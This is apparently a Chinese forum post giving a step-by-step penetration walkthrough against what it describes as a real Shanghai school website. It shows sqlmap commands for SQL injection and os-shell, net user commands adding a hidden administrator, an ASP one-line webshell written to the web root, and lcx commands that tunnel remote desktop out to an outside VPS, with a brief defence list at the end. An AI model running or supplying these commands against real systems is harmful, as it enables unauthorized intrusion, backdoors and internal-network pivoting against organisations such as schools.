同一站点多目标扫描及渗透

叶欢老师

在实际工作过程中，通过对一个目标的扫描，有可能出来很多子站点及其相关站点的扫描，通过awvs可以对多个目标的扫描，很多漏洞扫描软件，也不是商业扫描软件可以对多个目标继续扫描，其扫描过程跟单个目标的扫描过程类似，漏洞软件仅仅是做了一个多任务或者批量处理而已，最关键的地方在于对扫描结果的综合利用，在本例中主要介绍在涉及内网的情况下，如果通过lcx等工具来进行突破，虽然互联网上有很多代理穿透软件，但这些代理穿透脚本多为aspx、php和jsp，对asp的暂时没有支持。
1.1发现并测试SQL注入漏洞

1.sql注入漏洞发现思路
（1）通过AWVS等扫描工具对目标站点进行扫描。扫描结束后会提示，查看扫描结果，其中sql注入会以高危及红色提示信息显示。
（2）burpsuite抓包测试。通过burpsuite对目标网站进行抓包测试，在头文件或者post包中进行sql注入手工或自动测试。
（3）手工目测。浏览网站页面，对于有注入存在的地方一般有参数传入，例如“id=”等参数，将存在参数的网站地址放在sqlmap中进行自动测试。
2.发现目标站点sql注入点
  通过对上海某大的某一个附属中学的网站进行访问，发现其中存在一个id参数，手工测试该url，发现存在报错，猜测其存在SQL注入点的可能性极大。
3.使用sqlmap进行注入测试
  sqlmap -u http://www.*****.http://com.cn/schoolweb/displaypic.asp?id=594，执行后，如图1所示，显示目标系统存在五种类型的注入即布尔盲注、出错注入、内联查询注入、二次注入和基于时间的盲注，目标操作系统版本为Windows 2003，数据库为SQL Server 2005。


图1对sql注入点进行测试
1.2获取Webshell及提权

1.通过sqlmap获取当前目标系统信息
sqlmap -u http://www.*****.http://com.cn/schoolweb/displaypic.asp?id=594 --dbs --isdba --user
通过sqlmap可以方便的获取当前数据库的一些信息，如图2所示，当前数据库账号权限为sa，SQL Server 2005数据库sa权限+Windows 2003操作系统99%可以获取服务器权限。


图2获取当前数据库用户权限
2.获取os-shell权限
  执行命令sqlmap -u http://www.*****.http://com.cn/schoolweb/displaypic.asp?id=594 --os-shell直接获取os-shell。
（1）查看3389端口，通过该命令窗口查看服务器端口开放情况（netstat -an）发现3389端口对外开放。
（2）添加管理员权限，直接三行命令：
net user Summer Summerbure0. /add
net localgroup Administrators Summer /add
net localgroup “Remote Desktop Users” Summer /add
（3）对目标服务器进行端口扫描
  使用nmap对目标服务器进行端口扫描，也可以使用“masscan -p 1-65535 ip”进行扫描，扫描结果显示，目标服务器仅仅开放80端口。
（4）查看主机网络配置，使用“ipconfig /all”命令查看网络配置，如图3所示，服务器使用的是内网地址，学校服务器一般都是内网地址！


图3内网IP地址
3.获取webshell
（1）逐个查看磁盘内容
  使用dir c:\等命令逐个查看磁盘文件目录及其文件，如图4所示，当查看到E盘时发现在E盘存在web等目录。网站目录一般有明显的名称属性，例如wwwroot、site等。


图4获取web目录
（2）查看网站目录
  使用“dir E:\web”命令继续查看web目录内容，如图5所示，可以看到有明显特征的学校网页名称schoolweb，有些目标需要多次查看目录才能获取真正的网站路径。


图5查看网站目录
（3）直接写入asp的一句话木马。
  分别执行以下代码，来获取webshell及确认webshell是否成功写入网站文件，效果如图6所示。
echo ^<%execute(request(“summer”))^%> >E:\web\schoolweb\6.asp
dir E:\web\schoolweb\



图6写入一句话后门

4.成功获取webshell
  使用中国菜刀一句话后门连接地址：http://www.*****.http://com.cn/schoolweb/6.asp，密码summer，如图7所示，成功获取webshell。


图7成功获取webshell
1.3突破内网进入服务器

1.使用Tunna等内网转发失败
  内网服务器一般可以通过Tunna、reGeorg等进行端口转发来实现，在本次测试中未能成功。
（1）Tunna无asp脚本
  如图8所示，Tunna仅仅支持jsp、php和aspx，对asp脚本编程不支持，因此无法通过Tunna进行内网转发。



图8Tunna支持三大脚本
（2）reGeorg存在同样问题
reGeorg的webshell跟Tunna类似，reDuh等都存在同样问题
2.使用lcx穿透内网
（1）在国内某云上通过学生证申请一台VPS服务器，只要1元钱。
（2）目标服务器运行lcx
  将lcx进行免杀处理，上传后执行以下命令：
lcx_2.exe -slave 119.**.234.85 4500 192.168.14.106 3389，意思是连接VPS服务器119. **..234.85，内网IP地址192.168.14.106，内网端口3389转发到4500端口，如图9所示。


图9在目标服务器上运行lcx
（3）在VPS服务器上运行lcx
在vps服务器上运行 lcx.exe -listen 4500 5000，如图10所示，表示在本地监听并接收远程4500端口的数据到5000端口上。


图10vps运行lcx
（4）在本地登录3389
  在本地打开mstsc，输入127.0.0.1:500，或者独立IP:5000进行登录，如图11所示，输入前面加入的用户名及密码，成功登录该服务器。


图11成功登录远程终端
1.4总结及防御

1.本次渗透总结
（1）真正的目标主机渗透成功后，突破内网进入服务器跟本地模拟环境测试有很大的不同，网上很多代理穿透软件及其脚本，在真正环境中有很大的区别，比如很多代理仅仅支持jsp、php和aspx脚本，对asp脚本根本就没有代理支持。
（2）lcx是经典内网穿透工具，掌握其两条命令即可，关键是必须有外网独立IP地址，解决该问题可以通过购买云服务器来解决。
lcx_2.exe -slave 119.29.234.85 4500 192.168.14.106 3389 //目标目标执行命令
lcx.exe -listen 4500 5000 //vps执行命令
mstsc 127.0.0.1:5000 //vps上执行
（3）sqlmap功能强大，可以解决很多实际问题。
  在普通asp+SQL Server 2005环境需要开启xp_cmdshell存储进程，在sqlmap中通过os-shell直接可以解决，非常方便。
2.安全防御
（1）通过公开web漏洞扫描器对网站进行漏洞扫描，对扫描漏洞进行修复及处理。
（2）对网站代码进行审计，修复明显的sql注入等高危漏洞。
（3）严格控制网站脚本权限，网站文件上传目录有写入权限，但无脚本执行权限
（4）网站应用中，尽量使用最少数据库账号权限，一个应用一个账号。
（5）在服务器上安装杀毒软件及waf防护软件。

泰鹏注塑朱雪峰

发发呆，回回帖，工作结束~